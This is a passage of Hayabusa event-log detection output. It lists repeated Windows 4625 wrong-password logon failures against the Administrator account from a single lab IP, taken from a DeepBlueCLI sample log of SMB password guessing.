NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB3xsYe3RcPXhDib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxN9i8exdO2h4oa7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjcQaeuo4f8wFXhv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zCzr77BhliB4KKeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z558005RepKaO1zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HFzW25mJz4JLkv7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y7J8m97GQWt2cbSs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJrVwcpABBaZ8cyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VcDw3I4BaFLdIeCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: egEpV9aAuCFjwx2I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th0ZLWF4YeOaNnkK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ahrOLfdy6DCQ9SfO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xiooSdP5eib8PUE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6nQ2jp9IGYnGeyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejMtyR5QNdJFhw1W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e50kO0aVhfw5np5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 176XyLw6IhEI6NuD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXCzCSSFvpbWNJFd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhHRuZYlH8hekaKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGIUBFRMQ3OBbOA0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7CTT5g1w58eRRlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmVccmad66uOK9ox : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t1jlT6kEcs14dcNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBty5jOGkkZSZEyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Ci7YUsO5MtFkDSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 12JToliq9mmAuMTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lw9AgAvBGWoXBlim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ReGDyvRpGknAKqqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6mdUn8na4asRfpJP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7Wm5p4HnNCbkyh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MQZwerVd6E08X8Ou : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbDjtLKoX5Q77bn5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O7BNKHiPjzJKCaDk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHqBI8bzZn5VO9gq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xz2ZO3b3QSh6Rdqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEfdhrwbTfCpCXKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kc0LuQzAmQTIF1X3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WMZ70YmzpVp2h8mY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FFVr3Amq6mA3umiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnN15vqZcww8pqTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSuMRF1txQ9g2Mwi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tUuapChhs4CGO1cS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIMr0hjIkwD8AaEG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ww9HMQX0cqmolYQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJRRZ5e9lARVZDar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvUzVoSLqFPAXSWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SMMgPu1VJIjAWPDW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1JjIa4nOKDTLuAD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0J0GJIm1UUXHH9QJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVX3xIz0hrQFvPr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nv4tKFEmHjiXkVDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdHHJl9LBek9pIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MWofwwLjwiyBk39P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dvsHFZe7Z1uJ9Dkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aDdgwvb1zsZF79k : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQUb6CnMUtyrMNhF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP5OxHPsbLHnIUBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ysg903vYFhQHYvFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IySarHtsTvwSP56H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnUy8tbCIAVnmhDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bfBtc4MnMtPG6MpC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37b8MGIHY8QwXf9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDuaWikplDmJNmIE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kSSoAYJILHCPI7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9ikrtTGcZYU1556 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ypyd6SagvUXQHhtZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWS37lIJ3Q6ghgMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H211KmFImpBRwTGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64tO5iBehXQcNc49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xvxDngRj3j5TAwST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8VYRjMnxDgUTWYf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhWphTesbUf0hwi1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MO8VRRVANxIkDzEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ziSXANiDAf7LRFz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g0CvYYtyEcU2riBX : IP Address: 192.168.198.149 : AuthPackage: 